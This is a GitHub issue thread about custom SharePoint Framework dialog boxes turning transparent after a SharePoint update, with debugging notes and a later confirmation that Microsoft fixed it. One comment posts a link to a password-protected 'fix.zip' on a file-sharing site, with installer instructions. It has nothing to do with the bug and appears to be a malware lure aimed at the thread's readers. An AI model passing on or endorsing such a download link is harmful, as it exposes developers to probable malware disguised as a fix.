### ISSUE TITLE
Custom Dialog Boxes have Transparent Backgrounds

### ISSUE THREAD

**Issue by areestlc** [SharePoint/sp-dev-docs#9888]
### Target SharePoint environment

SharePoint Online

### What SharePoint development model, framework, SDK or API is this about?

💥 SharePoint Framework

### Developer environment

Windows

### What browser(s) / client(s) have you tested

- [ ] 💥 Internet Explorer
- [X] 💥 Microsoft Edge
- [X] 💥 Google Chrome
- [ ] 💥 FireFox
- [ ] 💥 Safari
- [ ] mobile (iOS/iPadOS)
- [ ] mobile (Android)
- [ ] not applicable
- [ ] other (enter in the "Additional environment details" area below)

### Describe the bug / error

It appears that a recent SharePoint update is causing an issue with custom Dialog boxes making their background completely transparent

### Steps to reproduce

1. Create an SPFx command bar button solution and add a custom Dialog box with the @microsoft/sp-dialog library
2. Click the button to show the Dialog box

### Expected behavior

It's expected that Dialog boxes will have a white background that stands out from the shaded background. At the moment the dialog boxes are appearing as floating text/buttons with a transparent background

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by EA12** [comment]
Hi,

I am investigating the same. That is very bad as in my case this is in production.
Please help as soon as possible. - Thanks

**Comment by christophepeerens** [comment]
+1

When the page is loaded, the "var(--colorNeutralBackground1)" (and others) is undefined. When you explicitly change the theme, then the theme variables are set correctly.

**Comment by EA12** [comment]
@christophepeerens : what are you going to tell us?
MS changed Design elements from the DialogContent and you want us to change our implementation to respect the latest SharePoint-Update? - Or are you telling MS what to change?
MS should fix that.

**Comment by SandyLT** [comment]
We notice that it's not only the transparency/colors that are broken, but also properties such as max-width, now set to 600px, causing an overflow appearance in our dialogs. We have hundreds of customers using our tools who currently have broken dialogs, so this is an urgent issue for us. Pinging @VesaJuvonen on this for visibility 😊

**Comment by christophepeerens** [comment]
@EA12 Yes, MS must fix it. Just added my findings to help them (MS) debug

**Comment by SandyLT** [comment]
It appears that this is working again as of today. That is, that the sp-dialog_none_f4feae3dcd35c5da3a30.js file is again loading as expected.

**Comment by EA12** [comment]
@christophepeerens : Thx!

It is working again :)

**Comment by christophepeerens** [comment]
Working for me also ;-)

**Comment by areestlc** [comment]
Looks like this issue is now fixed, thanks to everyone for contributing to the discussion and MS for resolving it fairly quickly
